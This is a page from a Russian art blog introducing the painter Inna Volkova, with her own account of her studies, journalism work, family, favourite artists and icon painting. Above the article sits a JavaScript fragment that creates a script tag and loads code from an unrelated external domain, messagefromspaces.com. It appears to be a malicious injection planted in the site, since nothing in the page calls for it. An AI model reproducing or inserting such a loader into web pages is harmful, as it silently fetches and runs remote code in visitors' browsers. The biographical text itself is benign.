, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Пользовательский поиск

Добро пожаловать

Советую посмотреть

Страницы

Свежие комментарии

Обмен ссылками

Картины, портреты, критика живописи, Art-дилер




style="display:inline-block;width:120px;height:600px"
data-ad-client="ca-pub-5725625417417931"
data-ad-slot="8961029732">


« | Главная | »

Художник. Инна Волкова.

Автор: Дмитрий Алмазов | 03 Янв 2011

Здравствуйте посетители и ценители живописи.  Хочу Вам представить художницу Инну Волкову. Родом она из города Сургута, Тюменской области.  Вот, что она хотела бы рассказать о себе:

"Я окончила в Сургуте художественную школу имени Л.А. Горда.   Участвовала в городском художественном конкурсе «Стихии природы», и была удостоена награды. По окончании школы хотела поступить учиться в Художественное  Учебное Заведение на дизайнера интерьера или архитектора, но получилось так, что жизнь свою связала с журналистикой. Сначала я год проучилась в Уральском Гуманитарном Университете на факультете теле-радиожурналистики, потом год в Санкт-Петербургском Государственном  Университете просто на факультете журналистики, теперь в Москве в Российском Православном Университете Апостола Иоанна Богослова на историко-филологическом, ранее именовавшемся церковной журналистикой. В  Высшей Национальной Школе Телевидения на Шаболовской обучаюсь основам телеведущего, чтобы в будущем возможно было вести какую-нибудь программу, связанную с Искусством или Культурой. Люблю фотографировать, путешествовать, знакомиться с новыми интересными людьми, различные культурные мероприятия, обогащающие духовно, чтение российской и зарубежной классики, археологию.  Мечтаю стать культурным и лингвистическим полиглотом, открыть свою светско-православную, историко-культурную, элитно-монархическую газету «Анабасис», что означает с греческого «Восхождение», о богатстве и потенциале русской культуры и русского народа.
У меня двое детей, Елисей 7 лет и Ксения 5 лет, которые живут пока у моих родителей в Петербурге. То есть один раз я была замужем за офицером-подводником с Камчатки, от которого я родила сына в Петербурге. Потом я сбежала от мужа в Сургут, влюбившись там в галантного бандита, который был старше меня почти на 30 лет. Но с ним жизнь тоже не сложилась. От этой сумасшедшей любви у меня родилась дочь Ксения, умница, красавица и лапочка, воспитанная и деликатная с пеленок в отличие от урагана-Елисея от «деликатного папы», который все снесет на своем пути, а потом остановится и подумает, что он наделал и что ему сейчас за это будет…

В данный момент на личном фронте у меня этап «стагнации», ожидания «третьего мужа», который должен соответствовать всем критериям отбора, которые я вынесла для себя после двух брачных перипетий.

В живописи я люблю классицизм, романтизм, сентиментализм, космизм и идеи, связанные с изображением жизни различных этносов, в их народных костюмах, с их атрибутами повседневности и культуры, а также религиозные мотивы, библейскую тематику. Очень нравится графика. Сама люблю работать над пейзажами (отечественная природа и дикая зарубежная, например, водопады Африки, джунгли Южной Америки), портретами людей (в основном по фотографии, так как из-за нехватки времени, люди не могут позировать…), натюрмортами…..

Из художников люблю Сурикова, Левитана, Репина, Айвазовского, также художников эпохи Возрождения, Рублева, как иконописца.

Сама иногда пишу иконы. Меня это окрыляет, возвышает и очищает. Журналистика очень стрессовая профессия, поэтому кисть после пера успокаивает именно тогда, когда берешься изобразить какую-нибудь икону. Это высшее состояние духа художника. Потому что за время работы над иконой, ты становишься единым целым с тем Святым, которого изображаешь, пытаешься его психологически понять и передать его внутренне состояние души, мысли, весь его духовный мир красками. Это не может не преображать и улучшать нравственно. Еще есть бонус при написании икон. Если художник открыт для духовного мира и постижения его тайн, то во время работы над иконой, с ним могут происходить чудеса, когда он чувствует, что будто сидит где-то на небе, беседует тихо с ангелами, они ему рассказывают какие-то новые невероятные вещи, а он просто «рисует» и принимает это к сведению. Потом он отчетливо понимает, что «уроки» были преподаны с блестящим педагогическим и научным мастерством, пригодным для повседневной жизни.

Однажды я принялась работать на религиозную тематику просто на куске белой ткани, так как под рукой не оказалось бумаги… Потом оказалось, что такая техника существует у китайцев.

С удовольствием занялась бы детскими портретами, или какой-нибудь воодушевляющей абстракцией «со смыслом»….

Темы: Галерея картин художников, Икона | 1 отзыв »

Один отзыв на “Художник. Инна Волкова.”

  1. Икона. Троица | Лаборатория Искусства пишет:
    01 Фев 2011 в 23:25

    [...] От автора Инны Волковой: "Когда работаешь над иконой Троицей Рублева, сразу [...]

Отзывы

Перед отправкой формы:
Лаборатория Искусства работает на WordPress